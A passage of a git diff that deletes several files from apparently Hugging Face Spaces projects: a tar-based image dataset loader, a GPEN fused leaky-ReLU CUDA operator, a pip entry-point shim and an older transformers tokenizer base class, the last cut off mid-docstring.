np.cumsum(self.dataset_lens) - self.num_samples = sum(self.dataset_lens) - labels = np.zeros(self.dataset_lens.sum(), dtype=np.int64) - sI = 0 - for k in range(len(self.dataset_lens)): - assert (sI+self.dataset_lens[k]) <= len(labels), f"{k} {sI+self.dataset_lens[k]} vs. 
{len(labels)}" - labels[sI:(sI+self.dataset_lens[k])] = k - sI += self.dataset_lens[k] - self.labels = labels - - def __len__(self): - return self.num_samples - - def __getitem__(self, index): - assert index >= 0 and index < len(self) - # find the dataset file we need to go to - d_index = np.searchsorted(self.dataset_cumsums, index) - - # edge case, if index is at edge of chunks, move right - if index in self.dataset_cumsums: - d_index += 1 - - assert d_index == self.labels[index], f"{d_index} vs. {self.labels[index]} mismatch for {index}" - - # change index to local dataset index - if d_index == 0: - local_index = index - else: - local_index = index - self.dataset_cumsums[d_index - 1] - data_bytes = self.chunk_datasets[d_index][local_index] - exception_to_catch = UnidentifiedImageError if unidentified_error_available else Exception - try: - image = Image.open(data_bytes).convert("RGB") - except exception_to_catch: - image = Image.fromarray(np.ones((224,224,3), dtype=np.uint8)*128) - d_index = -1 - - # label is the dataset (synset) we indexed into - return image, d_index, index - - def __repr__(self): - st = f"DiskTarDataset(subdatasets={len(self.dataset_lens)},samples={self.num_samples})" - return st - -class _TarDataset(object): - - def __init__(self, filename, npy_index_dir, preload=False): - # translated from - # fbcode/experimental/deeplearning/matthijs/comp_descs/tardataset.lua - self.filename = filename - self.names = [] - self.offsets = [] - self.npy_index_dir = npy_index_dir - names, offsets = self.load_index() - - self.num_samples = len(names) - if preload: - self.data = np.memmap(filename, mode='r', dtype='uint8') - self.offsets = offsets - else: - self.data = None - - - def __len__(self): - return self.num_samples - - def load_index(self): - basename = os.path.basename(self.filename) - basename = os.path.splitext(basename)[0] - names = np.load(os.path.join(self.npy_index_dir, f"{basename}_names.npy")) - offsets = np.load(os.path.join(self.npy_index_dir, 
f"{basename}_offsets.npy")) - return names, offsets - - def __getitem__(self, idx): - if self.data is None: - self.data = np.memmap(self.filename, mode='r', dtype='uint8') - _, self.offsets = self.load_index() - - ofs = self.offsets[idx] * 512 - fsize = 512 * (self.offsets[idx + 1] - self.offsets[idx]) - data = self.data[ofs:ofs + fsize] - - # compare against bytes (str comparison is always False in Python 3); - # tobytes() replaces the deprecated tostring() - if data[:13].tobytes() == b'././@LongLink': - data = data[3 * 512:] - else: - data = data[512:] - - # just to make it more fun a few JPEGs are GZIP compressed... - # catch this case - if tuple(data[:2]) == (0x1f, 0x8b): - s = io.BytesIO(data.tobytes()) - g = gzip.GzipFile(None, 'r', 0, s) - sdata = g.read() - else: - sdata = data.tobytes() - return io.BytesIO(sdata) \ No newline at end of file diff --git a/spaces/akhaliq/GPEN/face_model/op/fused_act.py b/spaces/akhaliq/GPEN/face_model/op/fused_act.py deleted file mode 100644 index 59db126ebcb59423cadd12baa830cbadce8b0292..0000000000000000000000000000000000000000 --- a/spaces/akhaliq/GPEN/face_model/op/fused_act.py +++ /dev/null @@ -1,96 +0,0 @@ -import os -import platform - -import torch -from torch import nn -import torch.nn.functional as F -from torch.autograd import Function -from torch.utils.cpp_extension import load, _import_module_from_library - -# if running GPEN without cuda, please comment line 11-19 -if platform.system() == 'Linux' and torch.cuda.is_available(): - module_path = os.path.dirname(__file__) - fused = load( - 'fused', - sources=[ - os.path.join(module_path, 'fused_bias_act.cpp'), - os.path.join(module_path, 'fused_bias_act_kernel.cu'), - ], - ) - - -#fused = _import_module_from_library('fused', '/tmp/torch_extensions/fused', True) - - -class FusedLeakyReLUFunctionBackward(Function): - @staticmethod - def forward(ctx, grad_output, out, negative_slope, scale): - ctx.save_for_backward(out) - ctx.negative_slope = negative_slope - ctx.scale = scale - - empty = grad_output.new_empty(0) - - grad_input = fused.fused_bias_act( - grad_output, empty, out, 3, 1, 
negative_slope, scale - ) - - dim = [0] - - if grad_input.ndim > 2: - dim += list(range(2, grad_input.ndim)) - - grad_bias = grad_input.sum(dim).detach() - - return grad_input, grad_bias - - @staticmethod - def backward(ctx, gradgrad_input, gradgrad_bias): - out, = ctx.saved_tensors - gradgrad_out = fused.fused_bias_act( - gradgrad_input, gradgrad_bias, out, 3, 1, ctx.negative_slope, ctx.scale - ) - - return gradgrad_out, None, None, None - - -class FusedLeakyReLUFunction(Function): - @staticmethod - def forward(ctx, input, bias, negative_slope, scale): - empty = input.new_empty(0) - out = fused.fused_bias_act(input, bias, empty, 3, 0, negative_slope, scale) - ctx.save_for_backward(out) - ctx.negative_slope = negative_slope - ctx.scale = scale - - return out - - @staticmethod - def backward(ctx, grad_output): - out, = ctx.saved_tensors - - grad_input, grad_bias = FusedLeakyReLUFunctionBackward.apply( - grad_output, out, ctx.negative_slope, ctx.scale - ) - - return grad_input, grad_bias, None, None - - -class FusedLeakyReLU(nn.Module): - def __init__(self, channel, negative_slope=0.2, scale=2 ** 0.5, device='cpu'): - super().__init__() - - self.bias = nn.Parameter(torch.zeros(channel)) - self.negative_slope = negative_slope - self.scale = scale - self.device = device - - def forward(self, input): - return fused_leaky_relu(input, self.bias, self.negative_slope, self.scale, self.device) - - -def fused_leaky_relu(input, bias, negative_slope=0.2, scale=2 ** 0.5, device='cpu'): - if platform.system() == 'Linux' and torch.cuda.is_available() and device != 'cpu': - return FusedLeakyReLUFunction.apply(input, bias, negative_slope, scale) - else: - return scale * F.leaky_relu(input + bias.view((1, -1)+(1,)*(len(input.shape)-2)), negative_slope=negative_slope) diff --git a/spaces/alexray/btc_predictor/venv/lib/python3.10/site-packages/pip/_internal/main.py b/spaces/alexray/btc_predictor/venv/lib/python3.10/site-packages/pip/_internal/main.py deleted file mode 100644 index 
33c6d24cd85b55a9fb1b1e6ab784f471e2b135f0..0000000000000000000000000000000000000000 --- a/spaces/alexray/btc_predictor/venv/lib/python3.10/site-packages/pip/_internal/main.py +++ /dev/null @@ -1,12 +0,0 @@ -from typing import List, Optional - - -def main(args: Optional[List[str]] = None) -> int: - """This is preserved for old console scripts that may still be referencing - it. - - For additional details, see https://github.com/pypa/pip/issues/7498. - """ - from pip._internal.utils.entrypoints import _wrapper - - return _wrapper(args) diff --git a/spaces/aliabd/SummerTime/model/third_party/HMNet/ThirdParty/Huggingface/Transformers/src/transformers/tokenization_utils.py b/spaces/aliabd/SummerTime/model/third_party/HMNet/ThirdParty/Huggingface/Transformers/src/transformers/tokenization_utils.py deleted file mode 100644 index 150d879c5cac5f762f11781294100a71811cb323..0000000000000000000000000000000000000000 --- a/spaces/aliabd/SummerTime/model/third_party/HMNet/ThirdParty/Huggingface/Transformers/src/transformers/tokenization_utils.py +++ /dev/null @@ -1,2166 +0,0 @@ -# coding=utf-8 -# Copyright 2018 The Open AI Team Authors and The HuggingFace Inc. team. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. 
-"""Tokenization classes for OpenAI GPT.""" - -import copy -import itertools -import json -import logging -import os -import re -from collections import defaultdict -from contextlib import contextmanager -from typing import List, Optional, Tuple, Union - -from tokenizers.implementations import BaseTokenizer - -from .file_utils import ( - cached_path, - hf_bucket_url, - is_remote_url, - is_tf_available, - is_torch_available, -) - - -if is_tf_available(): - import tensorflow as tf -if is_torch_available(): - import torch - -logger = logging.getLogger(__name__) - -SPECIAL_TOKENS_MAP_FILE = "special_tokens_map.json" -ADDED_TOKENS_FILE = "added_tokens.json" -TOKENIZER_CONFIG_FILE = "tokenizer_config.json" - - -@contextmanager -def truncate_and_pad( - tokenizer: BaseTokenizer, - max_length: int, - stride: int, - strategy: str, - pad_to_max_length: bool, - padding_side: str, - pad_token_id: int, - pad_token_type_id: int, - pad_token: str, -): - """ - This contextmanager is in charge of defining the truncation and the padding strategies and then - restoring the tokenizer settings afterwards. - - This contextmanager assumes the provided tokenizer has no padding / truncation strategy - before the managed section. If your tokenizer sets a padding / truncation strategy before, - then it will be reset to no padding/truncation when exiting the managed section. 
- - :param tokenizer: - :param max_length: - :param stride: - :param strategy: - :param pad_to_max_length: - :param padding_side: - :param pad_token_id: - :param pad_token_type_id: - :param pad_token: - :return: - """ - - # Handle all the truncation and padding stuff - if max_length is not None: - tokenizer.enable_truncation(max_length, stride=stride, strategy=strategy) - - if pad_to_max_length and (pad_token and pad_token_id >= 0): - tokenizer.enable_padding( - max_length=max_length, - direction=padding_side, - pad_id=pad_token_id, - pad_type_id=pad_token_type_id, - pad_token=pad_token, - ) - elif pad_to_max_length: - logger.warning( - "Disabled padding because no padding token set (pad_token: {}, pad_token_id: {}).\n" - "To remove this error, you can add a new pad token and then resize model embedding:\n" - "\ttokenizer.pad_token = ''\n\tmodel.resize_token_embeddings(len(tokenizer))".format( - pad_token, pad_token_id - ) - ) - - yield - - if max_length is not None: - tokenizer.no_truncation() - - if pad_to_max_length and (pad_token and pad_token_id >= 0): - tokenizer.no_padding() - - -class PreTrainedTokenizer(object): - """Base class for all tokenizers. - Handle all the shared methods for tokenization and special tokens as well as methods downloading/caching/loading pretrained tokenizers as well as adding tokens to the vocabulary. - - This class also contain the added tokens in a unified way on top of all tokenizers so we don't have to handle the specific vocabulary augmentation methods of the various underlying dictionary structures (BPE, sentencepiece...). - - Class attributes (overridden by derived classes): - - - ``vocab_files_names``: a python ``dict`` with, as keys, the ``__init__`` keyword name of each vocabulary file required by the model, and as associated values, the filename for saving the associated file (string). 
- - ``pretrained_vocab_files_map``: a python ``dict of dict`` the high-level keys being the ``__init__`` keyword name of each vocabulary file required by the model, the low-level being the `short-cut-names` (string) of the pretrained models with, as associated values, the `url` (string) to the associated pretrained vocabulary file. - - ``max_model_input_sizes``: a python ``dict`` with, as keys, the `short-cut-names` (string) of the pretrained models, and as associated values, the maximum length of the sequence inputs of this model, or None if the model has no maximum input size. - - ``pretrained_init_configuration``: a python ``dict`` with, as keys, the `short-cut-names` (string) of the pretrained models, and as associated values, a dictionnary of specific arguments to pass to the ``__init__``method of the tokenizer class for this pretrained model when loading the tokenizer with the ``from_pretrained()`` method. - - Parameters: - - - ``bos_token``: (`Optional`) string: a beginning of sentence token. Will be associated to ``self.bos_token`` and ``self.bos_token_id`` - - - ``eos_token``: (`Optional`) string: an end of sentence token. Will be associated to ``self.eos_token`` and ``self.eos_token_id`` - - - ``unk_token``: (`Optional`) string: an unknown token. Will be associated to ``self.unk_token`` and ``self.unk_token_id`` - - - ``sep_token``: (`Optional`) string: a separation token (e.g. to separate context and query in an input sequence). Will be associated to ``self.sep_token`` and ``self.sep_token_id`` - - - ``pad_token``: (`Optional`) string: a padding token. Will be associated to ``self.pad_token`` and ``self.pad_token_id`` - - - ``cls_token``: (`Optional`) string: a classification token (e.g. to extract a summary of an input sequence leveraging self-attention along the full depth of the model). Will be associated to ``self.cls_token`` and ``self.cls_token_id`` - - - ``mask_token``: (`Optional`) string: a masking token (e.g. 
when training a model with masked-language modeling). Will be associated to ``self.mask_token`` and ``self.mask_token_id`` - - - ``additional_special_tokens``: (`Optional`) list: a list of additional special tokens. Adding all special tokens here ensure they won't be split by the tokenization process. Will be associated to ``self.additional_special_tokens`` and ``self.additional_special_tokens_ids`` - """ - - vocab_files_names = {} - pretrained_vocab_files_map = {} - pretrained_init_configuration = {} - max_model_input_sizes = {} - model_input_names = ["token_type_ids", "attention_mask"] - - SPECIAL_TOKENS_ATTRIBUTES = [ - "bos_token", - "eos_token", - "unk_token", - "sep_token", - "pad_token", - "cls_token", - "mask_token", - "additional_special_tokens", - ] - - padding_side = "right" - - NO_PAD_TOKEN_FOR_BATCH_MSG = ( - "No padding token is set for this model, therefore no batch can be made with uneven " - "sequences. Set a padding token or adjust the lengths of the sequences building the " - "batch so that every sequence is of the same length." - ) - - UNEVEN_SEQUENCES_FOR_BATCH_MSG = ( - "The sequences building the batch are not of the same size, no tensor " - "can be built. Set `pad_to_max_length=True` to pad the smaller sequences" - "up to the larger sequence's length." - ) - - @property - def bos_token(self): - """Beginning of sentence token (string). Log an error if used while not having been set.""" - if self._bos_token is None: - logger.error("Using bos_token, but it is not set yet.") - return self._bos_token - - @property - def eos_token(self): - """End of sentence token (string). Log an error if used while not having been set.""" - if self._eos_token is None: - logger.error("Using eos_token, but it is not set yet.") - return self._eos_token - - @property - def unk_token(self): - """Unknown token (string). 
Log an error if used while not having been set.""" - if self._unk_token is None: - logger.error("Using unk_token, but it is not set yet.") - return self._unk_token - - @property - def sep_token(self): - """Separation token (string). E.g. separate context and query in an input sequence. Log an error if used while not having been set.""" - if self._sep_token is None: - logger.error("Using sep_token, but it is not set yet.") - return self._sep_token - - @property - def pad_token(self): - """Padding token (string). Log an error if used while not having been set.""" - if self._pad_token is None: - logger.error("Using pad_token, but it is not set yet.") - return self._pad_token - - @property - def cls_token(self): - """Classification token (string). E.g. to extract a summary of an input sequence leveraging self-attention along the full depth of the model. Log an error if used while not having been set.""" - if self._cls_token is None: - logger.error("Using cls_token, but it is not set yet.") - return self._cls_token - - @property - def mask_token(self): - """Mask token (string). E.g. when training a model with masked-language modeling. Log an error if used while not having been set.""" - if self._mask_token is None: - logger.error("Using mask_token, but it is not set yet.") - return self._mask_token - - @property - def additional_special_tokens(self): - """All the additional special tokens you may want to use (list of strings). 
Log an error if used while not having been set.""" - if self._additional_special_tokens is None: - logger.error("Using additional_special_tokens, but it is not set yet.") - return self._additional_special_tokens - - @bos_token.setter - def bos_token(self, value): - self._bos_token = value - - @eos_token.setter - def eos_token(self, value): - self._eos_token = value - - @unk_token.setter - def unk_token(self, value): - self._unk_token = value - - @sep_token.setter - def sep_token(self, value): - self._sep_token = value - - @pad_token.setter - def pad_token(self, value): - self._pad_token = value - - @cls_token.setter - def cls_token(self, value): - self._cls_token = value - - @mask_token.setter - def mask_token(self, value): - self._mask_token = value - - @additional_special_tokens.setter - def additional_special_tokens(self, value): - self._additional_special_tokens = value - - @property - def bos_token_id(self): - """Id of the beginning of sentence token in the vocabulary. Log an error if used while not having been set.""" - return self.convert_tokens_to_ids(self.bos_token) - - @property - def eos_token_id(self): - """Id of the end of sentence token in the vocabulary. Log an error if used while not having been set.""" - return self.convert_tokens_to_ids(self.eos_token) - - @property - def unk_token_id(self): - """Id of the unknown token in the vocabulary. Log an error if used while not having been set.""" - return self.convert_tokens_to_ids(self.unk_token) - - @property - def sep_token_id(self): - """Id of the separation token in the vocabulary. E.g. separate context and query in an input sequence. Log an error if used while not having been set.""" - return self.convert_tokens_to_ids(self.sep_token) - - @property - def pad_token_id(self): - """Id of the padding token in the vocabulary. 
Log an error if used while not having been set.""" - return self.convert_tokens_to_ids(self.pad_token) - - @property - def pad_token_type_id(self): - """Id of the padding token type in the vocabulary.""" - return self._pad_token_type_id - - @property - def cls_token_id(self): - """Id of the classification token in the vocabulary. E.g. to extract a summary of an input sequence leveraging self-attention along the full depth of the model. Log an error if used while not having been set.""" - return self.convert_tokens_to_ids(self.cls_token) - - @property - def mask_token_id(self): - """Id of the mask token in the vocabulary. E.g. when training a model with masked-language modeling. Log an error if used while not having been set.""" - return self.convert_tokens_to_ids(self.mask_token) - - @property - def additional_special_tokens_ids(self): - """Ids of all the additional special tokens in the vocabulary (list of integers). Log an error if used while not having been set.""" - return self.convert_tokens_to_ids(self.additional_special_tokens) - - def get_vocab(self): - """Returns the vocabulary as a dict of {token: index} pairs. `tokenizer.get_vocab()[token]` is equivalent to `tokenizer.convert_tokens_to_ids(token)` when `token` is in the vocab.""" - raise NotImplementedError() - - def __init__(self, max_len=None, **kwargs): - self._bos_token = None - self._eos_token = None - self._unk_token = None - self._sep_token = None - self._pad_token = None - self._cls_token = None - self._mask_token = None - self._pad_token_type_id = 0 - self._additional_special_tokens = [] - - self.max_len = max_len if max_len is not None else int(1e12) - - # Padding side is right by default and over-riden in subclasses. If specified in the kwargs, it is changed. 
- self.padding_side = kwargs.pop("padding_side", self.padding_side) - self.model_input_names = kwargs.pop("model_input_names", self.model_input_names) - - # Added tokens - self.added_tokens_encoder = {} - self.unique_added_tokens_encoder = set() - self.added_tokens_decoder = {} - - # inputs and kwargs for saving and re-loading (see ``from_pretrained`` and ``save_pretrained``) - self.init_inputs = () - self.init_kwargs = {} - - for key, value in kwargs.items(): - if key in self.SPECIAL_TOKENS_ATTRIBUTES: - if key == "additional_special_tokens": - assert isinstance(value, (list, tuple)) and all( - isinstance(t, str) for t in value - ) - else: - assert isinstance(value, str) - setattr(self, key, value) - - @classmethod - def from_pretrained(cls, *inputs, **kwargs): - r""" - Instantiate a :class:`~transformers.PreTrainedTokenizer` (or a derived class) from a predefined tokenizer. - - Args: - pretrained_model_name_or_path: either: - - - a string with the `shortcut name` of a predefined tokenizer to load from cache or download, e.g.: ``bert-base-uncased``. - - a string with the `identifier name` of a predefined tokenizer that was user-uploaded to our S3, e.g.: ``dbmdz/bert-base-german-cased``. - - a path to a `directory` containing vocabulary files required by the tokenizer, for instance saved using the :func:`~transformers.PreTrainedTokenizer.save_pretrained` method, e.g.: ``./my_model_directory/``. - - (not applicable to all derived classes, deprecated) a path or url to a single saved vocabulary file if and only if the tokenizer only requires a single vocabulary file (e.g. Bert, XLNet), e.g.: ``./my_model_directory/vocab.txt``. - - cache_dir: (`optional`) string: - Path to a directory in which a downloaded predefined tokenizer vocabulary files should be cached if the standard cache should not be used. - - force_download: (`optional`) boolean, default False: - Force to (re-)download the vocabulary files and override the cached versions if they exists. 
- - resume_download: (`optional`) boolean, default False: - Do not delete incompletely recieved file. Attempt to resume the download if such a file exists. - - proxies: (`optional`) dict, default None: - A dictionary of proxy servers to use by protocol or endpoint, e.g.: {'http': 'foo.bar:3128', 'http://hostname': 'foo.bar:4012'}. - The proxies are used on each request. - - inputs: (`optional`) positional arguments: will be passed to the Tokenizer ``__init__`` method. - - kwargs: (`optional`) keyword arguments: will be passed to the Tokenizer ``__init__`` method. Can be used to set special tokens like ``bos_token``, ``eos_token``, ``unk_token``, ``sep_token``, ``pad_token``, ``cls_token``, ``mask_token``, ``additional_special_tokens``. See parameters in the doc string of :class:`~transformers.PreTrainedTokenizer` for details. - - Examples:: - - # We can't instantiate directly the base class `PreTrainedTokenizer` so let's show our examples on a derived class: BertTokenizer - - # Download vocabulary from S3 and cache. - tokenizer = BertTokenizer.from_pretrained('bert-base-uncased') - - # Download vocabulary from S3 (user-uploaded) and cache. - tokenizer = BertTokenizer.from_pretrained('dbmdz/bert-base-german-cased') - - # If vocabulary files are in a directory (e.g. tokenizer was saved using `save_pretrained('./test/saved_model/')`) - tokenizer = BertTokenizer.from_pretrained('./test/saved_model/') - - # If the tokenizer uses a single vocabulary file, you can point directly to this file - tokenizer = BertTokenizer.from_pretrained('./test/saved_model/my_vocab.txt') - - # You can link tokens to special vocabulary when instantiating - tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', unk_token='') - # You should be sure '' is in the vocabulary when doing that. 
- # Otherwise use tokenizer.add_special_tokens({'unk_token': ''}) instead) - assert tokenizer.unk_token == '' - - """ - return cls._from_pretrained(*inputs, **kwargs) - - @classmethod - def _from_pretrained(cls, pretrained_model_name_or_path, *init_inputs, **kwargs): - cache_dir = kwargs.pop("cache_dir", None) - force_download = kwargs.pop("force_download", False) - resume_download = kwargs.pop("resume_download", False) - proxies = kwargs.pop("proxies", None) - local_files_only = kwargs.pop("local_files_only", False) - - s3_models = list(cls.max_model_input_sizes.keys()) - vocab_files = {} - init_configuration = {} - if pretrained_model_name_or_path in s3_models: - # Get the vocabulary from AWS S3 bucket - for file_id, map_list in cls.pretrained_vocab_files_map.items(): - vocab_files[file_id] = map_list[pretrained_model_name_or_path] - if ( - cls.pretrained_init_configuration - and pretrained_model_name_or_path in cls.pretrained_init_configuration - ): - init_configuration = cls.pretrained_init_configuration[ - pretrained_model_name_or_path - ].copy() - else: - # Get the vocabulary from local files - logger.info( - "Model name '{}' not found in model shortcut name list ({}). " - "Assuming '{}' is a path, a model identifier, or url to a directory containing tokenizer files.".format( - pretrained_model_name_or_path, - ", ".join(s3_models), - pretrained_model_name_or_path, - ) - ) - - if os.path.isfile(pretrained_model_name_or_path) or is_remote_url( - pretrained_model_name_or_path - ): - if len(cls.vocab_files_names) > 1: - raise ValueError( - "Calling {}.from_pretrained() with the path to a single file or url is not supported." 
- "Use a model identifier or the path to a directory instead.".format( - cls.__name__ - ) - ) - logger.warning( - "Calling {}.from_pretrained() with the path to a single file or url is deprecated".format( - cls.__name__ - ) - ) - file_id = list(cls.vocab_files_names.keys())[0] - vocab_files[file_id] = pretrained_model_name_or_path - else: - # At this point pretrained_model_name_or_path is either a directory or a model identifier name - additional_files_names = { - "added_tokens_file": ADDED_TOKENS_FILE, - "special_tokens_map_file": SPECIAL_TOKENS_MAP_FILE, - "tokenizer_config_file": TOKENIZER_CONFIG_FILE, - } - # Look for the tokenizer main vocabulary files + the additional tokens files - for file_id, file_name in { - **cls.vocab_files_names, - **additional_files_names, - }.items(): - if os.path.isdir(pretrained_model_name_or_path): - full_file_name = os.path.join( - pretrained_model_name_or_path, file_name - ) - if not os.path.exists(full_file_name): - logger.info( - "Didn't find file {}. We won't load it.".format( - full_file_name - ) - ) - full_file_name = None - else: - full_file_name = hf_bucket_url( - pretrained_model_name_or_path, postfix=file_name - ) - - vocab_files[file_id] = full_file_name - - # Get files from url, cache, or disk depending on the case - try: - resolved_vocab_files = {} - for file_id, file_path in vocab_files.items(): - if file_path is None: - resolved_vocab_files[file_id] = None - else: - resolved_vocab_files[file_id] = cached_path( - file_path, - cache_dir=cache_dir, - force_download=force_download, - proxies=proxies, - resume_download=resume_download, - local_files_only=local_files_only, - ) - except EnvironmentError: - if pretrained_model_name_or_path in s3_models: - msg = "Couldn't reach server at '{}' to download vocabulary files." - else: - msg = ( - "Model name '{}' was not found in tokenizers model name list ({}). 
" - "We assumed '{}' was a path or url to a directory containing vocabulary files " - "named {}, but couldn't find such vocabulary files at this path or url.".format( - pretrained_model_name_or_path, - ", ".join(s3_models), - pretrained_model_name_or_path, - list(cls.vocab_files_names.values()), - ) - ) - - raise EnvironmentError(msg) - - if all( - full_file_name is None for full_file_name in resolved_vocab_files.values() - ): - raise EnvironmentError( - "Model name '{}' was not found in tokenizers model name list ({}). " - "We assumed '{}' was a path, a model identifier, or url to a directory containing vocabulary files " - "named {} but couldn't find such vocabulary files at this path or url.".format( - pretrained_model_name_or_path, - ", ".join(s3_models), - pretrained_model_name_or_path, - list(cls.vocab_files_names.values()), - ) - ) - - for file_id, file_path in vocab_files.items(): - if file_path == resolved_vocab_files[file_id]: - logger.info("loading file {}".format(file_path)) - else: - logger.info( - "loading file {} from cache at {}".format( - file_path, resolved_vocab_files[file_id] - ) - ) - - # Prepare tokenizer initialization kwargs - # Did we saved some inputs and kwargs to reload ? 
- tokenizer_config_file = resolved_vocab_files.pop("tokenizer_config_file", None) - if tokenizer_config_file is not None: - with open( - tokenizer_config_file, encoding="utf-8" - ) as tokenizer_config_handle: - init_kwargs = json.load(tokenizer_config_handle) - saved_init_inputs = init_kwargs.pop("init_inputs", ()) - if not init_inputs: - init_inputs = saved_init_inputs - else: - init_kwargs = init_configuration - - # Update with newly provided kwargs - init_kwargs.update(kwargs) - - # Set max length if needed - if pretrained_model_name_or_path in cls.max_model_input_sizes: - # if we're using a pretrained model, ensure the tokenizer - # wont index sequences longer than the number of positional embeddings - max_len = cls.max_model_input_sizes[pretrained_model_name_or_path] - if max_len is not None and isinstance(max_len, (int, float)): - init_kwargs["max_len"] = min( - init_kwargs.get("max_len", int(1e12)), max_len - ) - - # Merge resolved_vocab_files arguments in init_kwargs. - added_tokens_file = resolved_vocab_files.pop("added_tokens_file", None) - special_tokens_map_file = resolved_vocab_files.pop( - "special_tokens_map_file", None - ) - for args_name, file_path in resolved_vocab_files.items(): - if args_name not in init_kwargs: - init_kwargs[args_name] = file_path - if special_tokens_map_file is not None: - with open( - special_tokens_map_file, encoding="utf-8" - ) as special_tokens_map_handle: - special_tokens_map = json.load(special_tokens_map_handle) - for key, value in special_tokens_map.items(): - if key not in init_kwargs: - init_kwargs[key] = value - - # Instantiate tokenizer. - try: - tokenizer = cls(*init_inputs, **init_kwargs) - except OSError: - raise OSError( - "Unable to load vocabulary from file. " - "Please check that the provided vocabulary is accessible and not corrupted." 
- ) - - # Save inputs and kwargs for saving and re-loading with ``save_pretrained`` - tokenizer.init_inputs = init_inputs - tokenizer.init_kwargs = init_kwargs - - # update unique_added_tokens_encoder with special tokens for correct tokenization - tokenizer.unique_added_tokens_encoder.update(set(tokenizer.all_special_tokens)) - - # Add supplementary tokens. - if added_tokens_file is not None: - with open(added_tokens_file, encoding="utf-8") as added_tokens_handle: - added_tok_encoder = json.load(added_tokens_handle) - added_tok_decoder = {v: k for k, v in added_tok_encoder.items()} - tokenizer.added_tokens_encoder.update(added_tok_encoder) - tokenizer.added_tokens_decoder.update(added_tok_decoder) - tokenizer.unique_added_tokens_encoder.update( - set(tokenizer.added_tokens_encoder.keys()) - ) - - return tokenizer - - def save_pretrained(self, save_directory): - """Save the tokenizer vocabulary files together with: - - added tokens, - - special-tokens-to-class-attributes-mapping, - - tokenizer instantiation positional and keywords inputs (e.g. do_lower_case for Bert). - - This won't save modifications other than (added tokens and special token mapping) you may have - applied to the tokenizer after the instantiation (e.g. modifying tokenizer.do_lower_case after creation). - - This method make sure the full tokenizer can then be re-loaded using the :func:`~transformers.PreTrainedTokenizer.from_pretrained` class method. 
- """ - if not os.path.isdir(save_directory): - logger.error( - "Saving directory ({}) should be a directory".format(save_directory) - ) - return - - special_tokens_map_file = os.path.join(save_directory, SPECIAL_TOKENS_MAP_FILE) - added_tokens_file = os.path.join(save_directory, ADDED_TOKENS_FILE) - tokenizer_config_file = os.path.join(save_directory, TOKENIZER_CONFIG_FILE) - - tokenizer_config = copy.deepcopy(self.init_kwargs) - if len(self.init_inputs) > 0: - tokenizer_config["init_inputs"] = copy.deepcopy(self.init_inputs) - for file_id in self.vocab_files_names.keys(): - tokenizer_config.pop(file_id, None) - - with open(tokenizer_config_file, "w", encoding="utf-8") as f: - f.write(json.dumps(tokenizer_config, ensure_ascii=False)) - - with open(special_tokens_map_file, "w", encoding="utf-8") as f: - f.write(json.dumps(self.special_tokens_map, ensure_ascii=False)) - - if len(self.added_tokens_encoder) > 0: - with open(added_tokens_file, "w", encoding="utf-8") as f: - out_str = json.dumps(self.added_tokens_encoder, ensure_ascii=False) - f.write(out_str) - - vocab_files = self.save_vocabulary(save_directory) - - return vocab_files + (special_tokens_map_file, added_tokens_file) - - def save_vocabulary(self, save_directory): - """Save the tokenizer vocabulary to a directory. This method does *NOT* save added tokens - and special token mappings. - - Please use :func:`~transformers.PreTrainedTokenizer.save_pretrained` `()` to save the full Tokenizer state if you want to reload it using the :func:`~transformers.PreTrainedTokenizer.from_pretrained` class method. - """ - raise NotImplementedError - - def vocab_size(self): - """Size of the base vocabulary (without the added tokens)""" - raise NotImplementedError - - def __len__(self): - """Size of the full vocabulary with the added tokens""" - return self.vocab_size + len(self.added_tokens_encoder) - - def add_tokens(self, new_tokens): - """ - Add a list of new tokens to the tokenizer class. 
If the new tokens are not in the - vocabulary, they are added to it with indices starting from the length of the current vocabulary. - - Args: - new_tokens: string or list of strings. Each string is a token to add. Tokens are only added if they are not already in the vocabulary (tested by checking whether the tokenizer assigns the index of the ``unk_token`` to them). - - Returns: - Number of tokens added to the vocabulary. - - Examples:: - - # Let's see how to increase the vocabulary of Bert model and tokenizer - tokenizer = BertTokenizer.from_pretrained('bert-base-uncased') - model = BertModel.from_pretrained('bert-base-uncased') - - num_added_toks = tokenizer.add_tokens(['new_tok1', 'my_new-tok2']) - print('We have added', num_added_toks, 'tokens') - model.resize_token_embeddings(len(tokenizer)) # Notice: resize_token_embeddings expects to receive the full size of the new vocabulary, i.e. the length of the tokenizer. - """ - if not new_tokens: - return 0 - - if not isinstance(new_tokens, list): - new_tokens = [new_tokens] - - to_add_tokens = [] - for token in new_tokens: - assert isinstance(token, str) - if ( - self.init_kwargs.get("do_lower_case", False) - and token not in self.all_special_tokens - ): - token = token.lower() - if ( - token != self.unk_token - and self.convert_tokens_to_ids(token) - == self.convert_tokens_to_ids(self.unk_token) - and token not in to_add_tokens - ): - to_add_tokens.append(token) - logger.info("Adding %s to the vocabulary", token) - - added_tok_encoder = dict( - (tok, len(self) + i) for i, tok in enumerate(to_add_tokens) - ) - added_tok_decoder = {v: k for k, v in added_tok_encoder.items()} - self.added_tokens_encoder.update(added_tok_encoder) - self.unique_added_tokens_encoder = set(self.added_tokens_encoder.keys()).union( - set(self.all_special_tokens) - ) - self.added_tokens_decoder.update(added_tok_decoder) - - return len(to_add_tokens) - - def num_added_tokens(self, pair=False): - """ - Returns the number of added tokens when encoding a 
sequence with special tokens. - - Note: - This encodes inputs and checks the number of added tokens, and is therefore not efficient. Do not put this - inside your training loop. - - Args: - pair: Returns the number of added tokens in the case of a sequence pair if set to True, returns the - number of added tokens in the case of a single sequence if set to False. - - Returns: - Number of tokens added to sequences - """ - token_ids_0 = [] - token_ids_1 = [] - return len( - self.build_inputs_with_special_tokens( - token_ids_0, token_ids_1 if pair else None - ) - ) - - def add_special_tokens(self, special_tokens_dict): - """ - Add a dictionary of special tokens (eos, pad, cls...) to the encoder and link them - to class attributes. If special tokens are NOT in the vocabulary, they are added - to it (indexed starting from the last index of the current vocabulary). - - Using `add_special_tokens` will ensure your special tokens can be used in several ways: - - - special tokens are carefully handled by the tokenizer (they are never split) - - you can easily refer to special tokens using tokenizer class attributes like `tokenizer.cls_token`. This makes it easy to develop model-agnostic training and fine-tuning scripts. - - When possible, special tokens are 